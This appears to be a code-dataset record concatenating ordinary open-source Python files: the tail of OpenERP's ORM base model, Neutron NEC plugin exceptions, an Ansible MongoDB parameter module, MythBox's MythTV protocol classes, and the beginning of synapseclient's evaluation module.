default: data[f] = default[f] elif 'function' in fields[f]: del data[f] elif ftype == 'many2one': try: data[f] = data[f] and data[f][0] except: pass elif 
ftype in ('one2many', 'one2one'): res = [] rel = self.pool.get(fields[f]['relation']) if data[f]: # duplicate following the order of the ids # because we'll rely on it later for copying # translations in copy_translation()! data[f].sort() for rel_id in data[f]: # the lines are first duplicated using the wrong (old) # parent but then are reassigned to the correct one thanks # to the (0, 0, ...) d = rel.copy_data(cr, uid, rel_id, context=context) if d: res.append((0, 0, d)) data[f] = res elif ftype == 'many2many': data[f] = [(6, 0, data[f])] del data['id'] # make sure we don't break the current parent_store structure and # force a clean recompute! for parent_column in ['parent_left', 'parent_right']: data.pop(parent_column, None) # Remove _inherits field's from data recursively, missing parents will # be created by create() (so that copy() copy everything). def remove_ids(inherits_dict): for parent_table in inherits_dict: del data[inherits_dict[parent_table]] remove_ids(self.pool.get(parent_table)._inherits) remove_ids(self._inherits) return data def copy_translations(self, cr, uid, old_id, new_id, context=None): if context is None: context = {} # avoid recursion through already copied records in case of circular relationship seen_map = context.setdefault('__copy_translations_seen',{}) if old_id in seen_map.setdefault(self._name,[]): return seen_map[self._name].append(old_id) trans_obj = self.pool.get('ir.translation') # TODO it seems fields_get can be replaced by _all_columns (no need for translation) fields = self.fields_get(cr, uid, context=context) translation_records = [] for field_name, field_def in fields.items(): # we must recursively copy the translations for o2o and o2m if field_def['type'] in ('one2one', 'one2many'): target_obj = self.pool.get(field_def['relation']) old_record, new_record = self.read(cr, uid, [old_id, new_id], [field_name], context=context) # here we rely on the order of the ids to match the translations # as foreseen in copy_data() 
old_children = sorted(old_record[field_name]) new_children = sorted(new_record[field_name]) for (old_child, new_child) in zip(old_children, new_children): target_obj.copy_translations(cr, uid, old_child, new_child, context=context) # and for translatable fields we keep them for copy elif field_def.get('translate'): trans_name = '' if field_name in self._columns: trans_name = self._name + "," + field_name elif field_name in self._inherit_fields: trans_name = self._inherit_fields[field_name][0] + "," + field_name if trans_name: trans_ids = trans_obj.search(cr, uid, [ ('name', '=', trans_name), ('res_id', '=', old_id) ]) translation_records.extend(trans_obj.read(cr, uid, trans_ids, context=context)) for record in translation_records: del record['id'] record['res_id'] = new_id trans_obj.create(cr, uid, record, context=context) def copy(self, cr, uid, id, default=None, context=None): """ Duplicate record with given id updating it with default values :param cr: database cursor :param uid: current user id :param id: id of the record to copy :param default: dictionary of field values to override in the original values of the copied record, e.g: ``{'field_name': overriden_value, ...}`` :type default: dictionary :param context: context arguments, like lang, time zone :type context: dictionary :return: id of the newly created record """ if context is None: context = {} context = context.copy() data = self.copy_data(cr, uid, id, default, context) new_id = self.create(cr, uid, data, context) self.copy_translations(cr, uid, id, new_id, context) return new_id def exists(self, cr, uid, ids, context=None): """Checks whether the given id or ids exist in this model, and return the list of ids that do. 
This is simple to use for a truth test on a browse_record:: if record.exists(): pass :param ids: id or list of ids to check for existence :type ids: int or [int] :return: the list of ids that currently exist, out of the given `ids` """ if type(ids) in (int, long): ids = [ids] query = 'SELECT id FROM "%s"' % (self._table) cr.execute(query + "WHERE ID IN %s", (tuple(ids),)) return [x[0] for x in cr.fetchall()] def check_recursion(self, cr, uid, ids, context=None, parent=None): _logger.warning("You are using deprecated %s.check_recursion(). Please use the '_check_recursion()' instead!" % \ self._name) assert parent is None or parent in self._columns or parent in self._inherit_fields,\ "The 'parent' parameter passed to check_recursion() must be None or a valid field name" return self._check_recursion(cr, uid, ids, context, parent) def _check_recursion(self, cr, uid, ids, context=None, parent=None): """ Verifies that there is no loop in a hierarchical structure of records, by following the parent relationship using the **parent** field until a loop is detected or until a top-level record is found. :param cr: database cursor :param uid: current user id :param ids: list of ids of records to check :param parent: optional parent field name (default: ``self._parent_name = parent_id``) :return: **True** if the operation can proceed safely, or **False** if an infinite loop is detected. """ if not parent: parent = self._parent_name ids_parent = ids[:] query = 'SELECT distinct "%s" FROM "%s" WHERE id IN %%s' % (parent, self._table) while ids_parent: ids_parent2 = [] for i in range(0, len(ids), cr.IN_MAX): sub_ids_parent = ids_parent[i:i+cr.IN_MAX] cr.execute(query, (tuple(sub_ids_parent),)) ids_parent2.extend(filter(None, map(lambda x: x[0], cr.fetchall()))) ids_parent = ids_parent2 for i in ids_parent: if i in ids: return False return True def _get_external_ids(self, cr, uid, ids, *args, **kwargs): """Retrieve the External ID(s) of any database record. 
**Synopsis**: ``_get_xml_ids(cr, uid, ids) -> { 'id': ['module.xml_id'] }`` :return: map of ids to the list of their fully qualified External IDs in the form ``module.key``, or an empty list when there's no External ID for a record, e.g.:: { 'id': ['module.ext_id', 'module.ext_id_bis'], 'id2': [] } """ ir_model_data = self.pool.get('ir.model.data') data_ids = ir_model_data.search(cr, uid, [('model', '=', self._name), ('res_id', 'in', ids)]) data_results = ir_model_data.read(cr, uid, data_ids, ['module', 'name', 'res_id']) result = {} for id in ids: # can't use dict.fromkeys() as the list would be shared! result[id] = [] for record in data_results: result[record['res_id']].append('%(module)s.%(name)s' % record) return result def get_external_id(self, cr, uid, ids, *args, **kwargs): """Retrieve the External ID of any database record, if there is one. This method works as a possible implementation for a function field, to be able to add it to any model object easily, referencing it as ``Model.get_external_id``. When multiple External IDs exist for a record, only one of them is returned (randomly). :return: map of ids to their fully qualified XML ID, defaulting to an empty string when there's none (to be usable as a function field), e.g.:: { 'id': 'module.ext_id', 'id2': '' } """ results = self._get_xml_ids(cr, uid, ids) for k, v in results.iteritems(): if results[k]: results[k] = v[0] else: results[k] = '' return results # backwards compatibility get_xml_id = get_external_id _get_xml_ids = _get_external_ids # Transience def is_transient(self): """ Return whether the model is transient. See TransientModel. """ return self._transient def _transient_clean_rows_older_than(self, cr, seconds): assert self._transient, "Model %s is not transient, it cannot be vacuumed!" 
% self._name cr.execute("SELECT id FROM " + self._table + " WHERE" " COALESCE(write_date, create_date, (now() at time zone 'UTC'))::timestamp <" " ((now() at time zone 'UTC') - interval %s)", ("%s seconds" % seconds,)) ids = [x[0] for x in cr.fetchall()] self.unlink(cr, SUPERUSER_ID, ids) def _transient_clean_old_rows(self, cr, count): assert self._transient, "Model %s is not transient, it cannot be vacuumed!" % self._name cr.execute( "SELECT id, COALESCE(write_date, create_date, (now() at time zone 'UTC'))::timestamp" " AS t FROM " + self._table + " ORDER BY t LIMIT %s", (count,)) ids = [x[0] for x in cr.fetchall()] self.unlink(cr, SUPERUSER_ID, ids) def _transient_vacuum(self, cr, uid, force=False): """Clean the transient records. This unlinks old records from the transient model tables whenever the "_transient_max_count" or "_max_age" conditions (if any) are reached. Actual cleaning will happen only once every "_transient_check_time" calls. This means this method can be called frequently called (e.g. whenever a new record is created). """ assert self._transient, "Model %s is not transient, it cannot be vacuumed!" % self._name self._transient_check_count += 1 if (not force) and (self._transient_check_count % self._transient_check_time): self._transient_check_count = 0 return True # Age-based expiration if self._transient_max_hours: self._transient_clean_rows_older_than(cr, self._transient_max_hours * 60 * 60) # Count-based expiration if self._transient_max_count: self._transient_clean_old_rows(cr, self._transient_max_count) return True def resolve_o2m_commands_to_record_dicts(self, cr, uid, field_name, o2m_commands, fields=None, context=None): """ Serializes o2m commands into record dictionaries (as if all the o2m records came from the database via a read()), and returns an iterable over these dictionaries. Because o2m commands might be creation commands, not all record ids will contain an ``id`` field. 
Commands matching an existing record (``UPDATE`` and ``LINK_TO``) will have an id. .. note:: ``CREATE``, ``UPDATE`` and ``LINK_TO`` stand for the o2m command codes ``0``, ``1`` and ``4`` respectively :param field_name: name of the o2m field matching the commands :type field_name: str :param o2m_commands: one2many commands to execute on ``field_name`` :type o2m_commands: list((int|False, int|False, dict|False)) :param fields: list of fields to read from the database, when applicable :type fields: list(str) :raises AssertionError: if a command is not ``CREATE``, ``UPDATE`` or ``LINK_TO`` :returns: o2m records in a shape similar to that returned by ``read()`` (except records may be missing the ``id`` field if they don't exist in db) :rtype: ``list(dict)`` """ o2m_model = self._all_columns[field_name].column._obj # convert single ids and pairs to tripled commands commands = [] for o2m_command in o2m_commands: if not isinstance(o2m_command, (list, tuple)): command = 4 commands.append((command, o2m_command, False)) elif len(o2m_command) == 1: (command,) = o2m_command commands.append((command, False, False)) elif len(o2m_command) == 2: command, id = o2m_command commands.append((command, id, False)) else: command = o2m_command[0] commands.append(o2m_command) assert command in (0, 1, 4), \ "Only CREATE, UPDATE and LINK_TO commands are supported in resolver" # extract records to read, by id, in a mapping dict ids_to_read = [id for (command, id, _) in commands if command in (1, 4)] records_by_id = dict( (record['id'], record) for record in self.pool.get(o2m_model).read( cr, uid, ids_to_read, fields=fields, context=context)) record_dicts = [] # merge record from db with record provided by command for command, id, record in commands: item = {} if command in (1, 4): item.update(records_by_id[id]) if command in (0, 1): item.update(record) record_dicts.append(item) return record_dicts # keep this import here, at top it will cause dependency cycle errors import expression class 
Model(BaseModel): """Main super-class for regular database-persisted OpenERP models. OpenERP models are created by inheriting from this class:: class user(Model): ... The system will later instantiate the class once per database (on which the class' module is installed). """ _auto = True _register = False # not visible in ORM registry, meant to be python-inherited only _transient = False # True in a TransientModel class TransientModel(BaseModel): """Model super-class for transient records, meant to be temporarily persisted, and regularly vaccuum-cleaned. A TransientModel has a simplified access rights management, all users can create new records, and may only access the records they created. The super-user has unrestricted access to all TransientModel records. """ _auto = True _register = False # not visible in ORM registry, meant to be python-inherited only _transient = True class AbstractModel(BaseModel): """Abstract Model super-class for creating an abstract class meant to be inherited by regular models (Models or TransientModels) but not meant to be usable on its own, or persisted. Technical note: we don't want to make AbstractModel the super-class of Model or BaseModel because it would not make sense to put the main definition of persistence methods such as create() in it, and still we should be able to override them within an AbstractModel. """ _auto = False # don't create any database backend for AbstractModels _register = False # not visible in ORM registry, meant to be python-inherited only _transient = False # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
subramani95/neutron
neutron/plugins/nec/common/exceptions.py
6
2883
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 NEC Corporation.  All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Ryota MIBU

from neutron.common import exceptions as qexc


class OFCException(qexc.NeutronException):
    """Generic failure reported by the OpenFlow Controller (OFC).

    Besides the formatted message, the raw HTTP status and error details
    from the OFC response are kept on the instance for callers that need
    to inspect them.
    """
    message = _("An OFC exception has occurred: %(reason)s")

    def __init__(self, **kwargs):
        super(OFCException, self).__init__(**kwargs)
        # Preserve low-level response details alongside the message.
        self.status = kwargs.get('status')
        self.err_msg = kwargs.get('err_msg')
        self.err_code = kwargs.get('err_code')


class OFCResourceNotFound(qexc.NotFound):
    """The requested resource does not exist on the OFC side."""
    message = _("The specified OFC resource (%(resource)s) is not found.")


class NECDBException(qexc.NeutronException):
    """Error raised from the NECPluginV2 database layer."""
    message = _("An exception occurred in NECPluginV2 DB: %(reason)s")


class OFCMappingNotFound(qexc.NotFound):
    """No Neutron-to-OFC ID mapping exists for the given resource."""
    message = _("Neutron-OFC resource mapping for "
                "%(resource)s %(neutron_id)s is not found. "
                "It may be deleted during processing.")


class OFCServiceUnavailable(OFCException):
    """OFC replied with HTTP 503; carries the advised retry delay."""
    message = _("OFC returns Server Unavailable (503) "
                "(Retry-After=%(retry_after)s)")

    def __init__(self, **kwargs):
        super(OFCServiceUnavailable, self).__init__(**kwargs)
        # Value of the Retry-After header, so callers can back off.
        self.retry_after = kwargs.get('retry_after')


class PortInfoNotFound(qexc.NotFound):
    """No PortInfo record with the given id."""
    message = _("PortInfo %(id)s could not be found")


class ProfilePortInfoInvalidDataPathId(qexc.InvalidInput):
    """datapath_id in a port profile failed validation."""
    message = _('Invalid input for operation: '
                'datapath_id should be a hex string '
                'with at most 8 bytes')


class ProfilePortInfoInvalidPortNo(qexc.InvalidInput):
    """port_no in a port profile is outside the valid range."""
    message = _('Invalid input for operation: '
                'port_no should be [0:65535]')


class RouterExternalGatewayNotSupported(qexc.BadRequest):
    """The selected router provider cannot attach an external network."""
    message = _("Router (provider=%(provider)s) does not support "
                "an external network")


class ProviderNotFound(qexc.NotFound):
    """The named router provider is not registered."""
    message = _("Provider %(provider)s could not be found")


class RouterOverLimit(qexc.Conflict):
    """The provider's router quota has been reached."""
    message = _("Cannot create more routers with provider=%(provider)s")


class RouterProviderMismatch(qexc.Conflict):
    """Operation attempted on a router owned by a different provider."""
    message = _("Provider of Router %(router_id)s is %(provider)s. "
                "This operation is supported only for router provider "
                "%(expected_provider)s.")
apache-2.0
pchauncey/ansible
lib/ansible/modules/database/mongodb/mongodb_parameter.py
29
6900
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2016, Loic Blot <loic.blot@unix-experience.fr> # Sponsored by Infopro Digital. http://www.infopro-digital.com/ # Sponsored by E.T.A.I. http://www.etai.fr/ # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: mongodb_parameter short_description: Change an administrative parameter on a MongoDB server. description: - Change an administrative parameter on a MongoDB server. version_added: "2.1" options: login_user: description: - The username used to authenticate with required: false default: null login_password: description: - The password used to authenticate with required: false default: null login_host: description: - The host running the database required: false default: localhost login_port: description: - The port to connect to required: false default: 27017 login_database: description: - The database where login credentials are stored required: false default: null replica_set: description: - Replica set to connect to (automatically connects to primary for writes) required: false default: null database: description: - The name of the database to add/remove the user from required: true ssl: description: - Whether to use an SSL connection when connecting to the database required: false default: false param: description: - MongoDB administrative parameter to modify required: true value: description: - MongoDB administrative parameter value to set required: true param_type: description: - Define the parameter value (str, int) required: false default: str notes: - Requires the pymongo Python package on the remote host, version 2.4.2+. This can be installed using pip or the OS package manager. 
@see http://api.mongodb.org/python/current/installation.html requirements: [ "pymongo" ] author: "Loic Blot (@nerzhul)" ''' EXAMPLES = ''' # Set MongoDB syncdelay to 60 (this is an int) - mongodb_parameter: param: syncdelay value: 60 param_type: int ''' RETURN = ''' before: description: value before modification returned: success type: string after: description: value after modification returned: success type: string ''' import os import traceback try: from pymongo.errors import ConnectionFailure from pymongo.errors import OperationFailure from pymongo import version as PyMongoVersion from pymongo import MongoClient except ImportError: try: # for older PyMongo 2.2 from pymongo import Connection as MongoClient except ImportError: pymongo_found = False else: pymongo_found = True else: pymongo_found = True from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.six.moves import configparser from ansible.module_utils._text import to_native # ========================================= # MongoDB module specific support methods. # def load_mongocnf(): config = configparser.RawConfigParser() mongocnf = os.path.expanduser('~/.mongodb.cnf') try: config.readfp(open(mongocnf)) creds = dict( user=config.get('client', 'user'), password=config.get('client', 'pass') ) except (configparser.NoOptionError, IOError): return False return creds # ========================================= # Module execution. 
# def main(): module = AnsibleModule( argument_spec=dict( login_user=dict(default=None), login_password=dict(default=None, no_log=True), login_host=dict(default='localhost'), login_port=dict(default=27017, type='int'), login_database=dict(default=None), replica_set=dict(default=None), param=dict(default=None, required=True), value=dict(default=None, required=True), param_type=dict(default="str", choices=['str', 'int']), ssl=dict(default=False, type='bool'), ) ) if not pymongo_found: module.fail_json(msg='the python pymongo module is required') login_user = module.params['login_user'] login_password = module.params['login_password'] login_host = module.params['login_host'] login_port = module.params['login_port'] login_database = module.params['login_database'] replica_set = module.params['replica_set'] ssl = module.params['ssl'] param = module.params['param'] param_type = module.params['param_type'] value = module.params['value'] # Verify parameter is coherent with specified type try: if param_type == 'int': value = int(value) except ValueError: module.fail_json(msg="value '%s' is not %s" % (value, param_type)) try: if replica_set: client = MongoClient(login_host, int(login_port), replicaset=replica_set, ssl=ssl) else: client = MongoClient(login_host, int(login_port), ssl=ssl) if login_user is None and login_password is None: mongocnf_creds = load_mongocnf() if mongocnf_creds is not False: login_user = mongocnf_creds['user'] login_password = mongocnf_creds['password'] elif login_password is None or login_user is None: module.fail_json(msg='when supplying login arguments, both login_user and login_password must be provided') if login_user is not None and login_password is not None: client.admin.authenticate(login_user, login_password, source=login_database) except ConnectionFailure as e: module.fail_json(msg='unable to connect to database: %s' % to_native(e), exception=traceback.format_exc()) db = client.admin try: after_value = db.command("setParameter", **{param: 
value}) except OperationFailure as e: module.fail_json(msg="unable to change parameter: %s" % to_native(e), exception=traceback.format_exc()) if "was" not in after_value: module.exit_json(changed=True, msg="Unable to determine old value, assume it changed.") else: module.exit_json(changed=(value != after_value["was"]), before=after_value["was"], after=value) if __name__ == '__main__': main()
gpl-3.0
nashve/mythbox
resources/src/mythbox/mythtv/protocol.py
5
9945
#
#  MythBox for XBMC - http://mythbox.googlecode.com
#  Copyright (C) 2011 analogue@yahoo.com
#
#  This program is free software; you can redistribute it and/or
#  modify it under the terms of the GNU General Public License
#  as published by the Free Software Foundation; either version 2
#  of the License, or (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program; if not, write to the Free Software
#  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
from mythbox.mythtv.enums import TVState, TVState44, TVState58

# MythTV protocol constants
initVersion = 8
initToken = ''
separator = u'[]:[]'
serverVersion = None


class ProtocolException(Exception):
    '''
    Thrown on protocol version mismatch between frontend and backend
    or general protocol related errors.
    '''
    pass


class BaseProtocol(object):
    """Abstract base class for version-specific MythTV wire protocols.

    Concrete subclasses override the abstract methods below; each
    Protocol<N> subclass inherits from its predecessor and overrides
    only what changed in that protocol revision.
    """

    def version(self):
        # NOTE: raise Exception(...) is used instead of the Python-2-only
        # ``raise Exception, msg`` statement form; behavior is identical.
        raise Exception('Abstract method')

    def recordSize(self):
        # Number of fields in a serialized program record.
        return len(self.recordFields())

    def tvState(self):
        raise Exception('Abstract method')

    def buildAnnounceFileTransferCommand(self, hostname, filePath):
        raise Exception('Abstract method')

    def getLiveTvBrain(self, settings, translator):
        raise Exception('Abstract method')

    def recordFields(self):
        # BUG FIX: this previously read ``return Exception, 'Abstract method'``
        # which silently handed callers a (class, str) tuple (and made
        # recordSize() return 2) instead of failing loudly.
        raise Exception('Abstract method')

    def emptyRecordFields(self):
        return []

    def protocolToken(self):
        return ""

    def mythVersion(self):
        raise Exception('Abstract method')

    def supportsStreaming(self, platform):
        raise Exception('Abstract method')


class Protocol40(BaseProtocol):

    def version(self):
        return 40

    def mythVersion(self):
        return '0.21'

    def recordFields(self):
        # Based on from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py
        return [
            'title', 'subtitle', 'description', 'category',
            'chanid', 'channum', 'callsign', 'channame',
            'filename', 'fs_high', 'fs_low', 'starttime',
            'endtime', 'duplicate', 'shareable', 'findid',
            'hostname', 'sourceid', 'cardid', 'inputid',
            'recpriority', 'recstatus', 'recordid', 'rectype',
            'dupin', 'dupmethod', 'recstartts', 'recendts',
            'repeat', 'programflags', 'recgroup', 'commfree',
            'outputfilters', 'seriesid', 'programid', 'lastmodified',
            'stars', 'airdate', 'hasairdate', 'playgroup',
            'recpriority2', 'parentid', 'storagegroup', 'audio_props',
            'video_props', 'subtitle_type']

    def tvState(self):
        return TVState

    def buildAnnounceFileTransferCommand(self, hostname, filePath):
        return ["ANN FileTransfer %s" % hostname, filePath]

    def getLiveTvBrain(self, settings, translator):
        # Imported lazily to avoid a circular import at module load time.
        from mythbox.ui.livetv import MythLiveTvBrain
        return MythLiveTvBrain(settings, translator)

    def getFileSize(self, program):
        # Pre-0.24 backends split the 64-bit file size into two 32-bit halves.
        from mythbox.mythtv.conn import decodeLongLong
        return decodeLongLong(int(program.getField('fs_low')), int(program.getField('fs_high'))) / 1024.0

    def genPixMapCommand(self):
        return ['QUERY_GENPIXMAP']

    def genQueryRecordingsCommand(self):
        return ['QUERY_RECORDINGS Play']

    def genPixMapPreviewFilename(self, program):
        return program.getBareFilename() + '.640x360.png'

    def supportsStreaming(self, platform):
        return True


class Protocol41(Protocol40):

    def version(self):
        return 41


class Protocol42(Protocol41):

    def version(self):
        return 42


class Protocol43(Protocol42):

    def version(self):
        return 43

    def recordFields(self):
        # Copied from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py
        # Same as Protocol40 plus trailing 'year'.
        return [
            'title', 'subtitle', 'description', 'category',
            'chanid', 'channum', 'callsign', 'channame',
            'filename', 'fs_high', 'fs_low', 'starttime',
            'endtime', 'duplicate', 'shareable', 'findid',
            'hostname', 'sourceid', 'cardid', 'inputid',
            'recpriority', 'recstatus', 'recordid', 'rectype',
            'dupin', 'dupmethod', 'recstartts', 'recendts',
            'repeat', 'programflags', 'recgroup', 'commfree',
            'outputfilters', 'seriesid', 'programid', 'lastmodified',
            'stars', 'airdate', 'hasairdate', 'playgroup',
            'recpriority2', 'parentid', 'storagegroup', 'audio_props',
            'video_props', 'subtitle_type', 'year']


class Protocol44(Protocol43):

    def version(self):
        return 44

    def tvState(self):
        return TVState44


class Protocol45(Protocol44):

    def version(self):
        return 45

    def buildAnnounceFileTransferCommand(self, hostname, filePath):
        # TODO: Storage group should be non-empty for recordings
        storageGroup = ''
        return ['ANN FileTransfer %s' % hostname, filePath, storageGroup]


class Protocol46(Protocol45):

    def version(self):
        return 46


class Protocol47(Protocol46):

    def version(self):
        return 47


class Protocol48(Protocol47):

    def version(self):
        return 48


class Protocol49(Protocol48):

    def version(self):
        return 49


class Protocol50(Protocol49):

    def version(self):
        return 50

    def mythVersion(self):
        return '0.22'


class Protocol56(Protocol50):

    def version(self):
        return 56

    def mythVersion(self):
        return '0.23'


class Protocol23056(Protocol56):

    def version(self):
        return 23056

    def mythVersion(self):
        return '0.23.1'


class Protocol57(Protocol56):

    def version(self):
        return 57

    def mythVersion(self):
        return '0.24'

    def recordFields(self):
        # 0.24 replaced the fs_high/fs_low pair with a single 'filesize'
        # field and dropped several legacy columns.
        return ['title', 'subtitle', 'description',
                'category', 'chanid', 'channum',
                'callsign', 'channame', 'filename',
                'filesize', 'starttime', 'endtime',
                'findid', 'hostname', 'sourceid',
                'cardid', 'inputid', 'recpriority',
                'recstatus', 'recordid', 'rectype',
                'dupin', 'dupmethod', 'recstartts',
                'recendts', 'programflags', 'recgroup',
                'outputfilters', 'seriesid', 'programid',
                'lastmodified', 'stars', 'airdate',
                'playgroup', 'recpriority2', 'parentid',
                'storagegroup', 'audio_props', 'video_props',
                'subtitle_type', 'year']

    def buildAnnounceFileTransferCommand(self, hostname, filePath):
        return ["ANN FileTransfer %s 0" % hostname, filePath, 'Default']

    def getFileSize(self, program):
        return int(program.getField('filesize')) / 1024.0

    def supportsStreaming(self, platform):
        # Eden and up
        return platform.xbmcVersion() >= 11.0


class Protocol58(Protocol57):

    def tvState(self):
        return TVState58

    def version(self):
        return 58


class Protocol59(Protocol58):

    def version(self):
        return 59


class Protocol60(Protocol59):

    def version(self):
        return 60

    def buildAnnounceFileTransferCommand(self, hostname, filePath):
        return ["ANN FileTransfer %s 0 1 10000" % hostname, filePath, 'Default']

    def genPixMapCommand(self):
        return ['QUERY_GENPIXMAP2', 'do_not_care']

    def genPixMapPreviewFilename(self, program):
        return '<EMPTY>'


class Protocol61(Protocol60):

    def version(self):
        return 61


class Protocol62(Protocol61):

    def version(self):
        return 62

    def protocolToken(self):
        return "78B5631E"


class Protocol63(Protocol62):

    def version(self):
        return 63

    def protocolToken(self):
        return "3875641D"


class Protocol64(Protocol63):

    def version(self):
        return 64

    def protocolToken(self):
        return "8675309J"


class Protocol65(Protocol64):

    def version(self):
        return 65

    def protocolToken(self):
        return "D2BB94C2"

    def genQueryRecordingsCommand(self):
        # technically the old query recs command works but actually causes
        # sorting which would be redundant and may be removed in the future
        return ['QUERY_RECORDINGS Unsorted']


# Current rev in mythversion.h
protocols = {
    40: Protocol40(),
    41: Protocol41(),
    42: Protocol42(),
    43: Protocol43(),
    44: Protocol44(),
    45: Protocol45(),
    46: Protocol46(),
    47: Protocol47(),
    48: Protocol48(),
    49: Protocol49(),
    50: Protocol50(),        # 0.22
    56: Protocol56(),        # 0.23
    23056: Protocol23056(),  # 0.23.1 - mythbuntu weirdness
    57: Protocol57(),        # 0.24
    58: Protocol58(),        # 0.24
    59: Protocol59(),        # 0.24
    60: Protocol60(),        # 0.24
    61: Protocol61(),        # 0.24
    62: Protocol62(),        # 0.24
    63: Protocol63(),        # 0.24
    64: Protocol64(),        # 0.24
    65: Protocol65()         # 0.24
}
gpl-2.0
larssono/synapsePythonClient
synapseclient/evaluation.py
1
7009
""" *********** Evaluations *********** An evaluation_ object represents a collection of Synapse Entities that will be processed in a particular way. This could mean scoring Entries in a challenge or executing a processing pipeline. Imports:: from synapseclient import Evaluation, Submission, SubmissionStatus Evaluations can be retrieved by ID:: evaluation = syn.getEvaluation(1901877) Like entities, evaluations are access controlled via ACLs. The :py:func:`synapseclient.Synapse.getPermissions` and :py:func:`synapseclient.Synapse.setPermissions` methods work for evaluations: access = syn.getPermissions(evaluation, user_id) The :py:func:`synapseclient.Synapse.submit` method returns a Submission_ object:: entity = syn.get(synapse_id) submission = syn.submit(evaluation, entity, name='My Data', team='My Team') The Submission object can then be used to check the `status <#submission-status>`_ of the submission:: status = syn.getSubmissionStatus(submission) The status of a submission may be: - **INVALID** the submitted entity is in the wrong format - **SCORED** in the context of a challenge or competition - **OPEN** indicating processing *has not* completed - **CLOSED** indicating processing *has* completed Submission status objects can be updated, usually by changing the *status* and *score* fields, and stored back to Synapse using :py:func:`synapseclient.Synapse.store`:: status.score = 0.99 status.status = 'SCORED' status = syn.store(status) See: - :py:func:`synapseclient.Synapse.getEvaluation` - :py:func:`synapseclient.Synapse.getEvaluationByContentSource` - :py:func:`synapseclient.Synapse.getEvaluationByName` - :py:func:`synapseclient.Synapse.submit` - :py:func:`synapseclient.Synapse.getSubmissions` - :py:func:`synapseclient.Synapse.getSubmission` - :py:func:`synapseclient.Synapse.getSubmissionStatus` - :py:func:`synapseclient.Synapse.getPermissions` - :py:func:`synapseclient.Synapse.setPermissions` ~~~~~~~~~~ Evaluation ~~~~~~~~~~ .. 
autoclass:: synapseclient.evaluation.Evaluation :members: __init__ ~~~~~~~~~~ Submission ~~~~~~~~~~ .. autoclass:: synapseclient.evaluation.Submission :members: __init__ ~~~~~~~~~~~~~~~~~ Submission Status ~~~~~~~~~~~~~~~~~ .. autoclass:: synapseclient.evaluation.SubmissionStatus :members: __init__ """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import sys from synapseclient.exceptions import * from synapseclient.dict_object import DictObject class Evaluation(DictObject): """ Keeps track of an evaluation queue in Synapse. Allowing for submissions, retrieval and scoring. :param name: Name of the evaluation :param description: A short description describing the evaluation :param contentSource: Synapse Project or entity associated with the evaluation :param submissionReceiptMessage: Message to display to users upon submission :param submissionInstructionsMessage: Message to display to users detailing acceptable formatting for submissions `To create an Evaluation <http://docs.synapse.org/rest/org/sagebionetworks/evaluation/model/Evaluation.html>`_ and store it in Synapse:: evaluation = syn.store(Evaluation( name="Q1 Final", description="Predict progression of MMSE scores for final scoring", contentSource="syn2290704")) The contentSource field links the evaluation to its :py:class:`synapseclient.entity.Project`. (Or, really, any synapse ID, but sticking to projects is a good idea.) 
`Evaluations <http://docs.synapse.org/rest/org/sagebionetworks/evaluation/model/Evaluation.html>`_ can be retrieved from Synapse by ID:: evaluation = syn.getEvaluation(1901877) ...by the Synapse ID of the content source (associated entity):: evaluation = syn.getEvaluationByContentSource('syn12345') ...or by the name of the evaluation:: evaluation = syn.getEvaluationByName('Foo Challenge Question 1') """ @classmethod def getByNameURI(cls, name): return '/evaluation/name/%s' %name @classmethod def getURI(cls, id): return '/evaluation/%s' %id def __init__(self, **kwargs): kwargs['status'] = kwargs.get('status', 'OPEN') kwargs['contentSource'] = kwargs.get('contentSource', '') if kwargs['status'] not in ['OPEN', 'PLANNED', 'CLOSED', 'COMPLETED']: raise ValueError('Evaluation Status must be one of [OPEN, PLANNED, CLOSED, COMPLETED]') if not kwargs['contentSource'].startswith('syn'): #Verify that synapse Id given raise ValueError('The "contentSource" parameter must be specified as a Synapse Entity when creating an Evaluation') super(Evaluation, self).__init__(kwargs) def postURI(self): return '/evaluation' def putURI(self): return '/evaluation/%s' %self.id def deleteURI(self): return '/evaluation/%s' %self.id def getACLURI(self): return '/evaluation/%s/acl' %self.id def putACLURI(self): return '/evaluation/acl' class Submission(DictObject): """ Builds an Synapse submission object. 
